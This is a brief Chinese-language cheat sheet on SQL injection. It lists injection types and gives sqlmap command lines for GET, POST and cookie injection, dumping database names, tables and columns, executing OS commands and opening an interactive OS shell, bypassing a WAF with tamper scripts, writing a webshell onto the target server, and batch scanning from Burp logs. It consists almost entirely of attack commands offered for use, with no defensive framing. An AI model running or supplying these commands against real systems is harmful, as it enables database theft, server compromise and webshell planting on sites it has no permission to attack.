SQL注入
- 基于bool盲注 即可以根据返回页面判断条件真假注入
- 基于时间的盲注,用条件语句查看时间延迟
- 语句是否执行(即页面返回时间是否增加)来判断
- 基于报错注入
- 联合查询注入
- 堆查询注入
三种方式
1.GET方式
[https://www.jianshu.com/p/fcdc0f86633a] [https://mp.weixin.qq.com/s?__biz=MzI3NzIzMzg3Mw==&mid=100000054&idx=1&sn=71f6c214f3833d9ca20b9f7dcd9d33e4#rd]
get与Post的区别,其中get参数通过url传递,poet放在request body中
sqlmap -u "URL"
2.POST方式
POST传递的参数要抓包才能看到
sqlmap -u "URL" --data "xx=yy"
sqlmap.py -r search-test.txt -p tfUPass [Text中的内容可以通过BP抓包获得POST参数]
3.Cookie方式
sqlmap -u "URL" --cookie "Cookie数据"
mysql注入
sqlmap -u "url" --current-db //获取库名
--tables -D "库名"
--columns -T "表名" -D “列名”
--dump
延时注入在什么情况下使用:页面无变化、无法用布尔真假判断、无法报错的情况下可以使用延时注入
--delay 1
-safe-freq
SQLMAP进行命令执行(提权)
sqlmap -u "url" --os-cmd=”命令“(使用交互式参数要知道网站的绝对路径)
--os-shell 交互式命令实现和文件上传两个php页面
Tamper 绕WAF
--tamper="脚本名字"
本地写入webshell --file-write "./mst/mst.txt"(本地文件的地址)
目标文件的地址路径 --file-dest "d:/www/1.html"
结合BP批量检测
sqlmap -l burp.log --batch -smart
batch:会自动选择yes smart:启发式快速判断,节约时间